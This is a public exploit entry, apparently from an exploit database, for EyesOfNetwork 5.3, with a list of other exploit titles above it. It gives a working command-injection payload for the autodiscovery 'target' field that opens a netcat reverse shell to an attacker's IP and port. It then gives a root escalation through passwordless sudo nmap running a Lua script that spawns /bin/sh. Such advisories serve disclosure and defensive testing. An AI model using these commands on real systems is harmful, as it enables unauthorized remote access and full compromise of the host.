66f2f8c3b5
9 changes to exploits/shellcodes PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval EyesOfNetwork 5.3 - RCE & PrivEsc Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting EyesOfNetwork 5.3 - LFI Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) OpenCart 3.0.36 - ATO via Cross Site Request Forgery Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
|
|
# Date: 10/01/2021
|
|
# Exploit Author: Audencia Business SCHOOL Red Team
|
|
# Vendor Homepage: https://www.eyesofnetwork.com/en
|
|
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
|
|
# Version: 5.3
|
|
|
|
#Authentified Romote Code Execution flaw > remote shell > PrivEsc
|
|
#
|
|
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.
|
|
|
|
==============================================
|
|
Initial RCE
|
|
|
|
In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php
|
|
|
|
The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like :
|
|
|
|
& nc -e /bin/sh <IP> <PORT>
|
|
==============================================
|
|
PrivEsc
|
|
|
|
The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
|
|
|
|
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
|
|
sudo nmap --script=/tmp/nmap.script |